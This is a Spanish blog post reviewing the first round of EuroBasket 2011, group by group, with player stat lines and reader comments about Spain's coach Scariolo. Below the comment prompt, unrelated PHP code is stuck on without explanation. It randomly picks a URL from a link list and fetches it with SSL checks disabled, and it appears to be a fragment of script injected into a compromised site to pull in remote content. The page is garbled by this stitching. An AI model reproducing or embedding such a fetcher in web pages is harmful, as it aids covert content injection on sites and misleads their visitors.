EuroNBAsket 2011: 1ª jornada

01 de September de 2011 por TheDeerHunter

Empezó la fiesta. Primera jornada de muy interesantes actuaciones individuales y colectivas y buen nivel anotador pero ninguna sorpresa. 12 partidos que procedemos a repasar lo más ligeramente posible.

GRUPO A

España 83 – Polonia 78:  Decía Scariolo el día anterior que España “sabe ocultar sus limitaciones”. No sé si sabrán hacerlo pero contra Polonia demostraron todo lo contrario. Agujero defensivo, especialmente en la posición de alero, añadiendo graves problemas en la dirección con numerosas pérdidas y cerrando los rebotes. Debilidades que se habían vislumbrado en la preparación y que ayer se airearon a los cuatro vientos. Con todo tuvieron la suerte de amarrar el resultado en los últimos instantes dando gracias, entre otras cosas, a contar con un tal Pau Gasol en sus filas (y a un tal Navarro) y que a Marcin Gortat no le habían arreglado previamente el seguro para participar en el campeonato. Hacía tiempo que no veíamos a ningún equipo perder un partido anotando dos tercios de sus tiros. Demasiadas faltas y tiros libres cedieron los polacos.

Destacado NBA: Pau Gasol 29 ptos, 7 reb, 2 tap, 2 asis
Destacado resto: Thomas Kelati 18 ptos, 3 reb, 7 asis, 3 rob

Turquía 79 – Portugal 56: Por contra Turquía no tuvo que sudar mucho frente a la débil Portugal, administrando cómodamente sus minutos. Los turcos también mostraron ciertos problemas para cerrar el rebote pero la incapacidad de los lusos para mirar aro supuso que ese aspecto no cobrara trascendencia. Se postulan como el peor equipo del campeonato y Turkoglu firmó un buen partido en los 19 minutitos que permaneció en cancha.

Destacado NBA: Enes Kanter 14 ptos, 7 reb en 22 minutos.

Lituania 80 – Gran Bretaña 69: Finalmente Gran Bretaña plantó cara a los anfitriones aunque tampoco pudieron traducirlo en una sorpresa. Brutal actuación de Luol Deng, bien acompañado por el resto de titulares pero una infame 2ª unidad les condena. Los lituanos controlaron bastante bien el choque exceptuando un tremendo apagón en el tercer cuarto con únicamente 5 puntos anotados, dando una vidilla insuficiente a los británicos.

Destacado NBA: Luol Deng 25 ptos, 10 reb, 4 asis, 2 rob, 2 tap
Destacado resto: Sarunas Jasikevicius 13 ptos, 4 asis, 2 reb (21 min)

GRUPO B

Serbia 80 – Italia 68: En el duelo a priori más interesante del día Serbia mostró jerarquía contra una correosa Italia. La “Azzurra” golpeó fuerte en los cuartos impares, primero con Gallinari y después con Andrea Bargnani. El mal partido de Bellinelli, la falta de producción no NBA y la irregularidad de Gallinari al que paulatinamente se le fueron apagando las luces les impidió aspirar a victoria. Los serbios, al revés, de menos a más. Hubo partido mientras no se despertó Teodosic. La irrupción de Milan Macvan en el 2º cuarto también es digna de mención.

Destacado NBA: Andrea Bargnani 22 ptos, 9 reb, 2 tap, 1 rob
Destacado resto: Milos Teodosic 15 ptos, 8 asis, 3 reb

Francia 89 – Letonia 78: El Francia-Letonia estuvo vistoso, con un espectacular duelo entre Tony Parker y Janis Blums. Los letones se mostraron particularmente peligrosos desde la línea de 3 con 11 triples de 23 intentos. En otras ocasiones bien hubiera podido significar un problema mayor para Francia, pero su eje NBA estuvo a buen nivel descartando cualquier atisbo sorpresa.

Destacado NBA: Tony Parker 31 ptos, 7 asis, 3 reb
Destacado resto: Janis Blums 32 ptos, 6 asis, 1 reb

Alemania 91 – Israel 64: Finalmente los alemanes no tuvieron piedad del conjunto israelí endosándoles el mayor castigo ofensivo del campeonato. Sensacional la dupla Kaman-Nowitzki, muy centrados y compenetrados. Pocas cosas positivas para Israel.

Destacados NBA: Chris Kaman 18 ptos, 10 reb – Dirk Nowitzki 25 ptos, 3 reb, 3 asis, 1 tap
Destacado resto: Guy Pnini 20 ptos (4/6 2p, 4/5 3p), 3 reb, 1 asis

GRUPO C

Grecia 76 – Bosnia-Herzegovina 67: Ilustraron el que se trata posiblemente del grupo más feo y más igualado. Los helenos, sin brillar excesivamente ni en ataque ni en defensa, controlaron los arreones de los balcánicos donde decepcionó Teletovic. Enfoque coral en la escuadra griega, con una rotación de 10 hombres por encima de los 10 minutos y únicamente Zisis en 31.

Destacados NBA: Kostas Koufos 10 ptos, 10 reb, 1 asis
Destacado resto: Elmedin Kikanovic 15 ptos, 4 reb, 1 rob, 1 tap

Croacia 84 – Finlandia 79: Aún disfrutando de un Bojan Bogdanovic especialmente brillante y superar a sus rivales por 15 rebotes de diferencia, los croatas se las arreglaron para complicarse la vida hasta el final. Hasta 20 pérdidas que pudieron costarles muy caro al equipo de Vrankovic. Finlandia vivió de la lotería del triple y poco faltó de que les saliera bien la jugada.

Destacado: Bojan Bogdanovic 27 ptos, 7 reb, 2 asis, 2 rob

Montenegro 70 – Macedonia 65: Otro ex del Real Madrid que la lió anoche fue Vladimir Dasic, vital para la primera victoria de su selección. McCalebb, Ilievski y Antic se tiraron nada menos que 45 de los 72 lanzamientos del equipo con una selección de tiro discutible en el mejor de los casos. 23 pérdidas de los montenegrinos, 6 de ellas de Nikola Pekovic que junto a Vucevic no marcaron la diferencia como se esperaba.

Destacado: Vladimir Dasic 20 ptos, 16 reb, 1 asis y 1 rob

GRUPO D

Bélgica 59 – Georgia 81: Los georgianos abusaron del juego interior belga doblándolos en rebotes. Mal lo van a pasar si el descartado Mbenga tiene que ser de lo poco salvable de la selección. No se tuvo que exprimir mucho Pachulia en 21 minutitos en pista. Su compañero Viktor Sanikidze fue el mejor y Shengelia anotó los 6 tiros que intentó en 15 minutos que permaneció en pista.

Destacados NBA: Zaza Pachulia 16 ptos, 3 reb, 1 asis (21 min)
Destacado resto: Viktor Sanikidze 13 ptos, 11 reb, 4 asis, 1 rob

Eslovenia 67 – Bulgaria 59: El partido más feo del día llevó la firma de Bozidar Maljkovic, quien se pudo complicar mucho la vida. No es que se defendiera con uñas y dientes con altos porcentajes de 2p. Pésimos ambos en triples y tiros libres. Interesante duelo entre Earl Rowland y Goran Dragic, aunque la diferencia la marcó un excelente Erazen Lorbek.

Destacados NBA: Goran Dragic 13 ptos, 6 reb, 6 asis, 1 rob
Destacados resto: Erazen Lorbek 18 ptos, 9 reb, 1 asis, 1 rob; Earl Rowland 20 ptos, 9 reb, 1 asis, 3 rob

Rusia 73 – Ukrania 64: Para finalizar los rusos controlaron bien el derbi ex-soviético. Correctos los ukranianos con Lishchuck a la cabeza, pero ellos no cuentan con un artista como Kirilenko en buena forma. Pérdidas y rebotes marcaron el resultado.

Destacado NBA: Andrei Kirilenko 20 ptos, 11 reb, 4 rob, 1 asis, 1 tap

Comenta

5 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Muy buen resumen, TheDeerHunter. Verdaderamente pocas sorpresas. Para hoy sí que puede ‘saltar la liebre’. Que tengan cuidado los griegos con Finlandia, que van sin miedo por la vida y son capaces de dar la sorpresa. También Rusia, al tran tran, cuidadito con Georgia. Ojalá que se lleven un sustito para que dejen de jugar a lo amarrategui. El partido más interesante a las 8. Italia – Alemania. Además lo veo un partido a tanteador alto y con los Bargnani, Bellinelli, Gallinari, Kaman y Nowitzki planteando espectáculo NBA. Le hace mucha falta al basket europeo empaparse del espíritu de baloncesto alegre que se juega en Estados Unidos. Por cierto, vaya decepción Valanciunas jugando 5 minutos o menos. Nos quedamos todos con las ganas. Y después Kanter saliéndose, muy buena pinta ese chaval.

    Propongo que hagas también una clasificación como las de siempre. El mvp…. tal; la decepción…. jeje, como el ranking que haceis durante el año. Parker lo petó ayer. Acojonante. Para mí el mvp de la jornada

      Citar

  2. CAMPO2 dice:
    #2

    Scariolo esta cuadriculado y es un corta rachas, cuando un jugador esta en racha lo cambia en lugar de dejarlo en cancha para irte de 20 o 25 puntos, luego se relajan o o el que entra no tiene el día y lo que eran +12 se convierte en +4. ¡¡¡¡¡¡¡Escarolas que no te enteras!!!!!!!

      Citar

  3. TheDeerHunter dice:
    #3

    Con 12 partidos el artículo ya me había quedado suficientemente ladrillo como para añadir premios.

    Sin embargo los tenía en la cabeza.
    Para MVP “a la par” que a Parker hubiera elegido a Bogdanovic, por aquello que Parker estaba mejor arropado con sus compañeros.
    Para sorpresa diría que los 16 rebotes de Dasic oscureciendo a Pekovic es bastante llamativo pero me encantó Kelati como “hombre orquesta” y mira que lo conocemos. Tampoco me parece moco de pavo que Jasikevicius se resista a envejecer.
    De decepción yo creo que todos tenemos en mente a Teletovic. A su nivel igual Grecia ya se había llevado un susto gordo… pero también deberíamos mencionar aquí a un buen número de los nuestros.
    Mayor esfuerzo en vano propongo a Luol Deng que estuvo supremo.

      Citar

  4. Nacho dice:
    #4

    Mira que siempre digo que son cuadriculados en la nba con lo de la 1ª y 2ª unidad. Pero ayer España, con un coach NBA no tiene problemas. Lo que dice CAMPO de las rachas es cierto, y a mí el Scariolo me gustaba, pero con la selección no da la tecla, creo que le viene grande.

      Citar

  5. Sancho88 dice:
    #5

    Es lo que hacía Eddie Jordan en Philladelphia con Elton Brand, Taddeus Young y demás. Y Sam Mitchell con Calde… Partido bueno… al banco diez minutos. Son entrenadores que no les entiende ni la madre que los pario.

    Hoy lo ha vuelto a hacer con Marc en el primer cuarto, con Calde en el tercero… en fin, si alguien lo entiende que me lo explique.

    Y por cierto, para nada artículo ladrillo. Se le muy digestivamente, mucho más que en diarios como el Marca o en el resumen que hicieron los de acb.com.
    Enhorabuena.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>